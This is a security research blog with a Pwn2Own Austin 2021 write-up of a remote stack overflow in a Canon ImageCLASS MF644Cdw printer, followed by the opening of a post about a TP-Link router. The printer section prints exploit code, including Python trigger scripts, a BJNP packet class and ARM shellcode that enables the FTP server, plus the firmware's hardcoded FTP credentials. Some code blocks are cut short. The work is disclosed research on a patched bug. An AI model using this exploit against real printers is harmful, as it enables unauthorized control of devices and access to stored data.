Before yesterdayDiary of a reverse-engineer

Introduction

Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

Firmware extraction and analysis

The Canon website is interesting: you cannot download the firmware for a particular model without having a serial number which matches that model. This, as you might guess, is particularly annoying when you want to download a firmware for a model you do not own. Two options came to our mind:

• Finding a picture of the model in a review or listing,
• Finding a serial number of the same model on Shodan.

Thankfully, the MFC644cdw was reviewed in details by PCmag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download a firmware from the Canon USA website. The version available online at the time on that website was 06.03.

Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several version of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

<contents-information>
<content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMDQ5" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMGFk" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>
<content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
<query arg="id" value="OTUwMzZkMTEx" />
<query arg="cmp" value="Z03" />
<query arg="lang" value="JA" />
</content>


Which correspond to:

• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
• gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

• MF640C => TYPEA
• MF740C => TYPEB
• LBP620C => TYPEC

Decryption: black box attempts

Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]


As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with a NCFW magic header. MacOS firmware updates can be extracted with 7z and contain a big file: mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.

Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F  !"#$%&'()*+,-./ 00000050 30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A 0123456789:;9..z 00000060 34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50 45OPDEF7HI.KMNOP 00000070 51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 QRSTUVWXYZ[\]^_  The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to have different hypothesis about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt: • A xor with a byte counter => fail • A xor with counter and feedback => fail Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption: • The updater tool does not decrypt the firmware but sends it as-is => fail • Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates: • FAIL • However, we found unencrypted firmware files with a similar structure which gave use a bit of known plaintext, but did not give any real clue about the solution Hardware: first look Main board and serial port Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware. • Looking at the hardware we considered these different approaches to obtain more information: • An SPI is present on the mainboard, read it • An Unsolder eMMC is present on the mainboard, read it • Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction. • Some printers are known to have a serial port for debug providing a mini shell. Find one and use it to run debug commands in order to get plaintext/memory dump (NOTE of course we found the serial port afterwards) Service mode All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files: • SUBLOG.TXT • SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware. Decrypting firmware Program synthesis approach At this point, this was our train of thought: • The encryption algorithm seemed "trivial" (lots of patterns, byte by byte) • SUBLOG.TXT gave us lots of plaintext • We were too lazy to find it by blackbox/reasoning As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors. However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep: (define int8? (bitvector 8)) (define (int8 i) (bv i int8?)) (define-grammar (fast-int8 x y) ; Grammar of int32 expressions over two inputs: [expr (choose x y (?? int8?) ; <expr> := x | y | <32-bit integer constant> | ((bop) (expr) (expr)) ; (<bop> <expr> <expr>) | ((uop) (expr)))] ; (<uop> <expr>) [bop (choose bvadd bvsub bvand ; <bop> := bvadd | bvsub | bvand | bvor bvxor bvshl ; bvor | bvxor | bvshl | bvlshr bvashr)] ; bvlshr | bvashr [uop (choose bvneg bvnot)]) ; <uop> := bvneg | bvnot (define (crypt x i) (fast-int8 x i #:depth 3))  Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints: (define sol (solve (assert ; removing constraints speed things up (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d)) ; [...] (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d)) (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20)) (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73)) (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75)) (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62)) ; [...] (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a)) (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20)) ) ) )) (print-forms sol)  After running racket rosette.rkt and waiting for a few minutes, we get the following output: (list 'define '(crypt x i) (list 'bvor (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8))) '(bvsub (bvadd i i) (bvadd x x))))  which is a valid decryption program ! But it's a bit untidy. So let's convert it to C, with a trivial simplification: uint8_t crypt(uint8_t i, uint8_t x) { uint8_t t = i-x; return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF; }  and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version: mov al, byte ptr [esp+4] sub al, byte ptr [esp+8] rol al ret  So our encryption algorithm was a trivial ror(x-i, 1)! Exploiting setup After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability. We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port. Serial port: dry shell The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts. Among the many powerful features offered, here are the most useful ones: • The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted. • The ability to perform basic filesystem operations. • The ability to list the running tasks and their associated memory segments. • The ability to start an FTP daemon, this will come handy later. • The ability to inspect the content of memory at a specific address. This feature was used a lot to understand what was going on during exploitation attempts. One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts. Vulnerability Attack surface The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like: • Printing functions and protocols, • Various web pages, • The HTTP server, • The SNMP server. We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing. Vulnerable function Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing: int __fastcall ntpv_isXPrivetTokenValid(char *token) { int tklen; // r0 char *colon; // r1 char *v4; // r1 int timestamp; // r4 int v7; // r2 int v8; // r3 int lvl; // r1 int time_delta; // r0 const char *msg; // r2 char buffer[256]; // [sp+4h] [bp-174h] BYREF char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF char sha1_res[24]; // [sp+120h] [bp-58h] BYREF int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF char last_part[12]; // [sp+150h] [bp-28h] BYREF int now; // [sp+15Ch] [bp-1Ch] BYREF int sha1len; // [sp+164h] [bp-14h] BYREF bzero(buffer, 0x100u); bzero(sha1_from_token, 0x18u); memset(last_part, 0, sizeof(last_part)); bzero(str_to_hash, 0x1Cu); bzero(sha1_res, 0x18u); sha1len = 20; if ( ischeckXPrivetToken() ) { tklen = strlen(token); base64decode(token, tklen, buffer); colon = strtok(buffer, ":"); if ( colon ) { strncpy(sha1_from_token, colon, 20); v4 = strtok(0, ":"); if ( v4 ) strncpy(last_part, v4, 10); } sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part); if ( sha1(str_to_hash, 28, sha1_res, &sha1len) ) { sha1_res[20] = 0; if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) ) { timestamp = strtol2(last_part); time(&now, 0, v7, v8); lvl = 86400; time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp; if ( time_delta <= 86400 ) { msg = "[NTPV] %s: x-privet-token is valid.\n"; lvl = 5; } else { msg = "[NTPV] %s: issue_timecounter is expired!!\n"; } if ( time_delta <= 86400 ) { log(3661, lvl, msg, "ntpv_isXPrivetTokenValid"); return 1; } log(3661, 5, msg, "ntpv_isXPrivetTokenValid"); } else { log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid"); } } else { log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid"); } return 0; } log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid"); return 1; }  The vulnerable code is the following line: base64decode(token, tklen, buffer);  With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled is limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple: -00000178 var_178 DCD ? -00000174 buffer DCB 256 dup(?) -00000074 str_to_hash DCB 28 dup(?) -00000058 sha1_res DCB 20 dup(?) -00000044 var_44 DCD ? -00000040 sha1_from_token DCB 24 dup(?) -00000028 last_part DCB 12 dup(?) -0000001C now DCD ? -00000018 DCB ? ; undefined -00000017 DCB ? ; undefined -00000016 DCB ? ; undefined -00000015 DCB ? ; undefined -00000014 sha1len DCD ? -00000010 -00000010 ; end of stack variables  The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more. ntpv functions The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below: privet_url nptv_urls[8] = { { 0, "/privet/info", "GET" }, { 1, "/privet/register", "POST" }, { 2, "/privet/accesstoken", "GET" }, { 3, "/privet/capabilities", "GET" }, { 4, "/privet/printer/createjob", "POST" }, { 5, "/privet/printer/submitdoc", "POST" }, { 6, "/privet/printer/jobstate", "GET" }, { 7, NULL, NULL } };  DATA:45C91C0C nptv_cmds id_cmd <0, ntpv_procInfo> DATA:45C91C0C ; DATA XREF: ntpv_cgiMain+338↑o DATA:45C91C0C ; ntpv_cgiMain:ntpv_cmds↑o DATA:45C91C0C id_cmd <1, ntpv_procRegister> DATA:45C91C0C id_cmd <2, ntpv_procAccesstoken> DATA:45C91C0C id_cmd <3, ntpv_procCapabilities> DATA:45C91C0C id_cmd <4, ntpv_procCreatejob> DATA:45C91C0C id_cmd <5, ntpv_procSubmitdoc> DATA:45C91C0C id_cmd <6, ntpv_procJobstate> DATA:45C91C0C id_cmd <7, 0>  After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code. Exploitation Triggering the bug Using a pattern generated with rsbkb, we were able to get the following crash on the serial port: Dry> < Error Exception > CORE : 0 TYPE : prefetch ISR : FALSE TASK ID : 269 TASK Name : AsC2 R 0 : 00000000 R 1 : 00000000 R 2 : 40ec49fc R 3 : 49789eb4 R 4 : 316f4130 R 5 : 41326f41 R 6 : 6f41336f R 7 : 49c1b38c R 8 : 49d0c958 R 9 : 00000000 R10 : 00000194 R11 : 45c91bc8 R12 : 00000000 R13 : 4978a030 R14 : 4167a1f4 PC : 356f4134 PSR : 60000013 CTRL : 00c5187d IE(31)=0  Which gives: $ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2


Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.

Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

@property
def r4(self):
return b"\x44\x44\x44\x44"

@property
def r5(self):
return b"\x55\x55\x55\x55"

@property
def r6(self):
return b"\x66\x66\x66\x66"

@property
def pc(self):

def __bytes__(self):
return (
b":" * 0x160
+ struct.pack("<I", 0x20)  # pHashStrBufLen
+ self.r4
+ self.r5
+ self.r6
+ self.pc
)


The vulnerability can then be triggered with the following code, assuming the printer's IP address is 192.168.1.100:

import base64
import http.client

"Content-type": "application/json",
"Accept": "text/plain",
}

conn = http.client.HTTPConnection("192.168.1.100", 80)


To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

• Store our exploit in the buffer used to trigger the overflow and jump into it,
• Find another buffer we controlled and jump into it,
• Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.

BJNP

One of the supported protocols is BJNP, which was conveniently exploited by Synacktiv ninjas on a different printer, accessible on UDP port 8611. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (
EnumField,
ShortField,
StrLenField,
BitEnumField,
FieldLenField,
StrFixedLenField,
)

class BJNPPkt(Packet):
name = "BJNP Packet"

BJNP_DEVICE_ENUM = {
0x0: "Client",
0x1: "Printer",
0x2: "Scanner",
}

BJNP_COMMAND_ENUM = {
0x000: "GetPortConfig",
0x201: "GetNICInfo",
0x202: "NICCmd",
0x210: "SessionStart",
0x211: "SessionEnd",
0x212: "GetSessionInfo",
0x221: "DataWrite",
0x230: "GetDeviceID",
0x232: "CmdNotify",
0x240: "AppCmd",
}

BJNP_ERROR_ENUM = {
0x8300: "Session error",
}

fields_desc = [
StrFixedLenField("magic", default=b"MFNP", length=4),
BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
ShortField("seq_no", default=0),
ShortField("sess_id", default=0),
FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),
]


For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.

Initial PoC

Quick recap of the exploitation strategy:

• Start a BJNP session and store our exploit in the session data,
• Exploit the buffer overflow to jump in the session buffer,
• Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12


To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr


Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

)

pkt = BJNPPkt(
cmd=0x210,
seq_no=0,
sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

# The printer should return a valid session ID
assert res.sess_id != 0, ValueError("Failed to create session")

pkt = BJNPPkt(
cmd=0x211,
seq_no=0,
sess_id=1,
)
pkt.show2()
sock.sendall(bytes(pkt))

res = BJNPPkt(sock.recv(4096))
res.show2()

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.1.100", 8610))

"Content-type": "application/json",
"Accept": "text/plain",
}

conn = http.client.HTTPConnection("192.168.1.100", 80)

time.sleep(5)

sock.close()


We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

• Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
• Make sure the screen is turned on (for example, by disabling the energy save mode as above),
• Call the display function with our image data to show it on screen.

Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
unsigned short x;
unsigned short y;
unsigned short width;
unsigned short height;
};


The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y


Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12


This leaves the question of the image buffer itself.

FTP

Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

• Enable the ftpd service,
• Upload our image from the client,
• Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous client, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12


The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it to: either access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="192.168.1.100", user="guest", passwd="welcome.") as ftp:
with open("image.raw") as f:
ftp.storbinary("STOR a", f)


File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end


The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
.loop:
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
sub r4, r4, r0
cmp r4, #0
bgt .loop


For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12


Putting everything together

In the end, our exploit is split into 3 parts:

1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
2. Upload our image using FTP,
3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit.zip and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...

Patch

Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.

Conclusion

In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

26 March 2022 at 15:00

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
